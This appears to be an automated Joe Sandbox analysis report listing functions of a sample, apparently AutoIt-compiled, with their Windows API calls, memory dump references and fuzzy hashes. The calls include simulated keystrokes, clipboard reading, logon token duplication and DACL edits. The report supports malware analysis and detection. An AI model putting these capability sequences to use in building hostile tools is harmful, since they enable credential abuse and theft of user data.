                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                            • Instruction ID: e6e05bcffee9adb0ba098b5402648b8c2730e21b3ef34e606cab30ac578c1965
                                                                                                            • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                            • Instruction Fuzzy Hash: A4D0A73090520CEBCB20CFBC9C049DE77A8E704320F004764FD15C7280D53199819750
                                                                                                            Function 00D51CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00D51CBC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoParametersSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098949447-0
                                                                                                            • Opcode ID: 6ef533a1df696cdfeb7576bbe35382d556af314627c2f217335c4da32605a63c
                                                                                                            • Instruction ID: 442eaedb3cd5e6c96b29dfe15a39ab6a766f8e4019b180536a8ba57aa27211c6
                                                                                                            • Opcode Fuzzy Hash: 6ef533a1df696cdfeb7576bbe35382d556af314627c2f217335c4da32605a63c
                                                                                                            • Instruction Fuzzy Hash: 91C09B352C0344BFF2249781BC4AF107755B35CB00F048001F709B95E3C3A11415D651
                                                                                                            Function 015D7FCC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 015D7FE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                            • Instruction ID: e990d25f4771e2a047c4fa714f459ea02928138e4cd05556bbbddb2d57169f83
                                                                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                            • Instruction Fuzzy Hash: F6E09A7494410EAFDB10EFA8D94969E7BB4EF04301F1005A1FD1596681DB309A548A62
                                                                                                            Function 015D7FD0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 015D7FE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                            • Instruction ID: 3b66747ff4c853da9d19ba1006affe05439a7ac8043f916e02df7851726197be
                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                            • Instruction Fuzzy Hash: 77E0BF7494410E9FDB10EFA8D94969E7BB4EF04301F1001A1FD1192281DA3099508A62

                                                                                                            Non-executed Functions

                                                                                                            Function 00DE9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00DE961A
                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DE965B
                                                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00DE969F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DE96C9
                                                                                                            • SendMessageW.USER32 ref: 00DE96F2
                                                                                                            • GetKeyState.USER32(00000011), ref: 00DE978B
                                                                                                            • GetKeyState.USER32(00000009), ref: 00DE9798
                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DE97AE
                                                                                                            • GetKeyState.USER32(00000010), ref: 00DE97B8
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DE97E9
                                                                                                            • SendMessageW.USER32 ref: 00DE9810
                                                                                                            • SendMessageW.USER32(?,00001030,?,00DE7E95), ref: 00DE9918
                                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00DE992E
                                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DE9941
                                                                                                            • SetCapture.USER32(?), ref: 00DE994A
                                                                                                            • ClientToScreen.USER32(?,?), ref: 00DE99AF
                                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DE99BC
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DE99D6
                                                                                                            • ReleaseCapture.USER32 ref: 00DE99E1
                                                                                                            • GetCursorPos.USER32(?), ref: 00DE9A19
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DE9A26
                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DE9A80
                                                                                                            • SendMessageW.USER32 ref: 00DE9AAE
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DE9AEB
                                                                                                            • SendMessageW.USER32 ref: 00DE9B1A
                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DE9B3B
                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DE9B4A
                                                                                                            • GetCursorPos.USER32(?), ref: 00DE9B68
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DE9B75
                                                                                                            • GetParent.USER32(?), ref: 00DE9B93
                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DE9BFA
                                                                                                            • SendMessageW.USER32 ref: 00DE9C2B
                                                                                                            • ClientToScreen.USER32(?,?), ref: 00DE9C84
                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DE9CB4
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DE9CDE
                                                                                                            • SendMessageW.USER32 ref: 00DE9D01
                                                                                                            • ClientToScreen.USER32(?,?), ref: 00DE9D4E
                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DE9D82
                                                                                                              • Part of subcall function 00D69944: GetWindowLongW.USER32(?,000000EB), ref: 00D69952
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE9E05
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                            • String ID: @GUI_DRAGID$F$p#
                                                                                                            • API String ID: 3429851547-638943876
                                                                                                            • Opcode ID: 7bdb9f183a942e9efe0f771d41c286b1ce6d785e2194a878b54afbe6eb663dbb
                                                                                                            • Instruction ID: 87716714d54da776a3b0327df85736831e24a283df19e0a0c01b32bad6e3b33a
                                                                                                            • Opcode Fuzzy Hash: 7bdb9f183a942e9efe0f771d41c286b1ce6d785e2194a878b54afbe6eb663dbb
                                                                                                            • Instruction Fuzzy Hash: A5429D30205380AFDB24EF26CC94AAABBF5FF89310F14061EF999972A1D731D955CB61
                                                                                                            Function 00DE4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00DE48F3
                                                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00DE4908
                                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00DE4927
                                                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00DE494B
                                                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00DE495C
                                                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00DE497B
                                                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00DE49AE
                                                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00DE49D4
                                                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00DE4A0F
                                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DE4A56
                                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DE4A7E
                                                                                                            • IsMenu.USER32(?), ref: 00DE4A97
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DE4AF2
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DE4B20
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE4B94
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00DE4BE3
                                                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00DE4C82
                                                                                                            • wsprintfW.USER32 ref: 00DE4CAE
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DE4CC9
                                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DE4CF1
                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DE4D13
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DE4D33
                                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DE4D5A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                            • String ID: %d/%02d/%02d
                                                                                                            • API String ID: 4054740463-328681919
                                                                                                            • Opcode ID: 790532157523c29b6c4fddc23fa224ebf540613c552aa5192070576a0d68d0ba
                                                                                                            • Instruction ID: dc319e1f0842475936d3279755464b5e2845256ff44f7857a8c10a814663dc46
                                                                                                            • Opcode Fuzzy Hash: 790532157523c29b6c4fddc23fa224ebf540613c552aa5192070576a0d68d0ba
                                                                                                            • Instruction Fuzzy Hash: 4C12D071900394ABEB24AF26CC49FAE7BB8EF45710F144129F919EB2A1D774D941CB70
                                                                                                            Function 00D6F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D6F998
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DAF474
                                                                                                            • IsIconic.USER32(00000000), ref: 00DAF47D
                                                                                                            • ShowWindow.USER32(00000000,00000009), ref: 00DAF48A
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00DAF494
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DAF4AA
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DAF4B1
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DAF4BD
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DAF4CE
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DAF4D6
                                                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00DAF4DE
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00DAF4E1
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF4F6
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00DAF501
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF50B
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00DAF510
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF519
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00DAF51E
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF528
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00DAF52D
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00DAF530
                                                                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00DAF557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 4125248594-2988720461
                                                                                                            • Opcode ID: 6649f9a0adac1d50b25b837961453af95bda537a28beb8026e8b91b761a96588
                                                                                                            • Instruction ID: b29e925e2dd0e05db389fca4a4dc76015d82ce7ba318cafd1244e038f513e95e
                                                                                                            • Opcode Fuzzy Hash: 6649f9a0adac1d50b25b837961453af95bda537a28beb8026e8b91b761a96588
                                                                                                            • Instruction Fuzzy Hash: 26315271A503587FEB206BF59C89FBF7E6DEB45B50F141065FA00EA2D1C6B09D01AA70
                                                                                                            Function 00DB1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DB170D
                                                                                                              • Part of subcall function 00DB16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
                                                                                                              • Part of subcall function 00DB16C3: GetLastError.KERNEL32 ref: 00DB174A
                                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DB1286
                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DB12A8
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DB12B9
                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DB12D1
                                                                                                            • GetProcessWindowStation.USER32 ref: 00DB12EA
                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00DB12F4
                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DB1310
                                                                                                              • Part of subcall function 00DB10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DB11FC), ref: 00DB10D4
                                                                                                              • Part of subcall function 00DB10BF: CloseHandle.KERNEL32(?,?,00DB11FC), ref: 00DB10E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                            • String ID: $default$winsta0$Z
                                                                                                            • API String ID: 22674027-1808616255
                                                                                                            • Opcode ID: ca981c0159851708263bb7a61c7d470235c7c8937e834febb3af90bfe20e6164
                                                                                                            • Instruction ID: 7910502f362bb2076011e0700e9cc54e2d1c6bcfd83ec0a22764dcfbe4bb315a
                                                                                                            • Opcode Fuzzy Hash: ca981c0159851708263bb7a61c7d470235c7c8937e834febb3af90bfe20e6164
                                                                                                            • Instruction Fuzzy Hash: AC818A75900349EBDF21AFA4DC99BEE7BB9EF04704F584129F912E62A0DB318945CB30
                                                                                                            Function 00DB0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DB1114
                                                                                                              • Part of subcall function 00DB10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1120
                                                                                                              • Part of subcall function 00DB10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB112F
                                                                                                              • Part of subcall function 00DB10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1136
                                                                                                              • Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D
                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DB0BCC
                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DB0C00
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00DB0C17
                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00DB0C51
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DB0C6D
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00DB0C84
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DB0C8C
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00DB0C93
                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DB0CB4
                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00DB0CBB
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DB0CEA
                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DB0D0C
                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DB0D1E
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0D45
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB0D4C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0D55
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB0D5C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0D65
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB0D6C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00DB0D78
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB0D7F
                                                                                                              • Part of subcall function 00DB1193: GetProcessHeap.KERNEL32(00000008,00DB0BB1,?,00000000,?,00DB0BB1,?), ref: 00DB11A1
                                                                                                              • Part of subcall function 00DB1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DB0BB1,?), ref: 00DB11A8
                                                                                                              • Part of subcall function 00DB1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DB0BB1,?), ref: 00DB11B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 4175595110-0
                                                                                                            • Opcode ID: 80733c3f0351d119d8cbbae04d8e0355f9ce89a4334d49665002bfabe0130980
                                                                                                            • Instruction ID: 9097773308686c153adb9437edf0eab650e2c8b855f96e666c29f160a8248471
                                                                                                            • Opcode Fuzzy Hash: 80733c3f0351d119d8cbbae04d8e0355f9ce89a4334d49665002bfabe0130980
                                                                                                            • Instruction Fuzzy Hash: E1713A7590024AEBDF10AFA4DC84FEFBBB8BF05310F184515E916EA291D771AA06CB70
                                                                                                            Function 00DCEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32(00DECC08), ref: 00DCEB29
                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DCEB37
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00DCEB43
                                                                                                            • CloseClipboard.USER32 ref: 00DCEB4F
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00DCEB87
                                                                                                            • CloseClipboard.USER32 ref: 00DCEB91
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00DCEBBC
                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00DCEBC9
                                                                                                            • GetClipboardData.USER32(00000001), ref: 00DCEBD1
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00DCEBE2
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00DCEC22
                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 00DCEC38
                                                                                                            • GetClipboardData.USER32(0000000F), ref: 00DCEC44
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00DCEC55
                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DCEC77
                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DCEC94
                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DCECD2
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00DCECF3
                                                                                                            • CountClipboardFormats.USER32 ref: 00DCED14
                                                                                                            • CloseClipboard.USER32 ref: 00DCED59
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 420908878-0
                                                                                                            • Opcode ID: 8eb00be46c339b237b86bbddc7699831de81412baa8ca0cd9beb7bac2fef8596
                                                                                                            • Instruction ID: 05f4a2d27250fec53ff6e7a8a878f38ae208d916b8489e766dc5dcc4c430f503
                                                                                                            • Opcode Fuzzy Hash: 8eb00be46c339b237b86bbddc7699831de81412baa8ca0cd9beb7bac2fef8596
                                                                                                            • Instruction Fuzzy Hash: F96189B42043429FD700EF24C895F6ABBA4AB84714F18551DF8569B2A2DB71D90ACBB2
                                                                                                            Function 00DC698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00DC69BE
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DC6A12
                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DC6A4E
                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DC6A75
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DC6AB2
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DC6ADF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
